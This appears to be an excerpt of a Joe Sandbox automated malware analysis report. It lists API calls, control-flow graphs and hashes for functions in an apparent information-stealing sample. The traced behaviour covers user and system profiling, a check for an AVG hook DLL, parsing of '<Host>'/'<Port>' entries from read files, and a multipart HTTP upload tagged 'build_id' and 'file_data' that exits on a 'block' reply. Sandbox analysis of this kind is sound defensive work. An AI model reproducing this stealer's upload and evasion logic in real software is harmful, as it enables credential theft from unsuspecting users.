                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 362916592-0
                                                                                                                                                                        • Opcode ID: 95d22baf1e02f1acaa0ab690b1309e3620a13a46ba4be9fdb19be0adbee4662e
                                                                                                                                                                        • Instruction ID: 8959b72c7f2d3a517e53602beffba1d243a844a183c2ba10b011e2ac22bdfabb
                                                                                                                                                                        • Opcode Fuzzy Hash: 95d22baf1e02f1acaa0ab690b1309e3620a13a46ba4be9fdb19be0adbee4662e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF0E971601324ABEB01FBB4FC49BAB3BACAB04725F040256F515DB1D0DB709D458B91
                                                                                                                                                                        Function 00190C28 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001813B9), ref: 00190C34
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,001813B9), ref: 00190C3B
                                                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,001813B9), ref: 00190C4F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1206570057-0
                                                                                                                                                                        • Opcode ID: c1c6a78fe3175e306f6f9590e74c1bf2d34bfc3569a1d5efe1d352456ba97362
                                                                                                                                                                        • Instruction ID: 9246232286b2201ac7037013b36fab88ad02b21bb79aec8a06f63a053ee7ed7a
                                                                                                                                                                        • Opcode Fuzzy Hash: c1c6a78fe3175e306f6f9590e74c1bf2d34bfc3569a1d5efe1d352456ba97362
                                                                                                                                                                        • Instruction Fuzzy Hash: 44D05BB5204204BBD741A7D5DC4DF8F77BCD788755F000155F645D2150D7F099848730
                                                                                                                                                                        Function 00190F8F Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                                        • Opcode ID: 21a52c0223ffdce870d8ff285b76cf9ae5e5250103938315ffdb00ab60dc9f87
                                                                                                                                                                        • Instruction ID: 8ab8a77da0f378cc6e641ad1af78c0dc2f42431d7102bc4cb8d43af05d5be666
                                                                                                                                                                        • Opcode Fuzzy Hash: 21a52c0223ffdce870d8ff285b76cf9ae5e5250103938315ffdb00ab60dc9f87
                                                                                                                                                                        • Instruction Fuzzy Hash: 67E012B195011D9BCF11EFA0FC559ED7BFCAB04304F4045B5A505E7190D774AB898F84
                                                                                                                                                                        Function 001814AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00181503,avghookx.dll,00198586), ref: 001814DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                                                        • Opcode ID: d34a6fea11231841d32b12c99103b98cf0918207ac9d56d12b3079544e2c0af4
                                                                                                                                                                        • Instruction ID: a485f56a04da0aab6336a38b3ea79328870d218cdaad8a6e8128f3fabd3b9508
                                                                                                                                                                        • Opcode Fuzzy Hash: d34a6fea11231841d32b12c99103b98cf0918207ac9d56d12b3079544e2c0af4
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF0FE37904154FBCF21DF59D804AAAF7BDEB47761F256054E409B3600C730EE55AB98
                                                                                                                                                                        Function 00185482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 29 185482-1854d0 call 1904bc call 1904ee call 184ab6 35 1854d5-185593 call 191e32 lstrlenA call 191e32 call 1904bc * 4 StrCmpCA 29->35 48 18559b-1855a1 35->48 49 185595 35->49 50 1855be-1856ce call 191c1f call 19059c call 190562 call 182920 * 2 call 1905de call 19059c call 1905de call 190562 call 182920 * 3 call 1905de call 19059c call 190562 call 182920 * 2 InternetConnectA 48->50 51 1855a3-1855b8 InternetOpenA 48->51 49->48 52 185e64-185eec call 182920 * 4 call 1904ee call 182920 * 3 50->52 118 1856d4-185712 HttpOpenRequestA 50->118 51->50 51->52 86 185eee-185f2e call 182920 * 6 call 19d05a 52->86 119 185e58-185e5e InternetCloseHandle 118->119 120 185718-18571e 118->120 119->52 121 18573c-185d77 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 1a70a0 lstrlenA call 1a70a0 lstrlenA * 2 call 1a70a0 lstrlenA HttpSendRequestA HttpQueryInfoA 120->121 122 185720-185736 InternetSetOptionA 120->122 309 185d79-185db0 call 1904bc call 182920 * 3 121->309 310 185db5-185dc5 call 191ad2 121->310 122->121 309->86 315 185dcb-185dd0 310->315 316 185f2f 310->316 318 185e11-185e2e InternetReadFile 315->318 320 185e30-185e43 StrCmpCA 318->320 321 185dd2-185dda 318->321 324 185e4c-185e52 InternetCloseHandle 320->324 325 185e45-185e46 ExitProcess 320->325 321->320 323 185ddc-185e0c call 1905de call 190562 call 182920 321->323 323->318 324->119
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185519
                                                                                                                                                                          • Part of subcall function 00191E32: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,003DE708,?,?,?,001928E1,?,?,00000000), ref: 00191E52
                                                                                                                                                                          • Part of subcall function 00191E32: GetProcessHeap.KERNEL32(00000000,?,?,?,?,001928E1,?,?,00000000), ref: 00191E5F
                                                                                                                                                                          • Part of subcall function 00191E32: HeapAlloc.KERNEL32(00000000,?,?,?,001928E1,?,?,00000000), ref: 00191E66
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6976,001B695B,001B6957,001B694B), ref: 00185588
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001855AA
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001856C0
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00185704
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00185736
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                        • lstrlenA.KERNEL32(?,",file_data,001B7848,------,001B783C,?,",001B7830,------,001B7824,df523263f44cc8d55414a260a0197e4a,",build_id,001B780C,------), ref: 00185C67
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185C7A
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00185C92
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00185C99
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185CA6
                                                                                                                                                                        • _memmove.LIBCMT ref: 00185CB4
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 00185CC9
                                                                                                                                                                        • _memmove.LIBCMT ref: 00185CD6
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185CE4
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00185CF2
                                                                                                                                                                        • _memmove.LIBCMT ref: 00185D05
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00185D1A
                                                                                                                                                                        • HttpSendRequestA.WININET(?,?,00000000), ref: 00185D2D
                                                                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00185D6F
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00185E26
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,block), ref: 00185E3B
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00185E46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                        • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$df523263f44cc8d55414a260a0197e4a$file_data
                                                                                                                                                                        • API String ID: 2638065154-1849827821
                                                                                                                                                                        • Opcode ID: 67d70663e7b20b3006c4efaf45bc568db909330afc8aeba9d32992d1231cc5cb
                                                                                                                                                                        • Instruction ID: 9bfe0aab9c3e049caef41729813122bcda0405a74e8666b8f5043dec51f8624a
                                                                                                                                                                        • Opcode Fuzzy Hash: 67d70663e7b20b3006c4efaf45bc568db909330afc8aeba9d32992d1231cc5cb
                                                                                                                                                                        • Instruction Fuzzy Hash: FD428071D111699BEF22FB20DC42ADDB7B8BB24304F0585E1E589B7162DB706F869F80
                                                                                                                                                                        Function 0018E6A4 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                        • strtok_s.MSVCRT ref: 0018E753
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,001B68FF,001B68FE,001B68EF,001B68EE), ref: 0018E799
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018E7A0
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0018E7B4
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E7BF
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0018E7F3
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E7FE
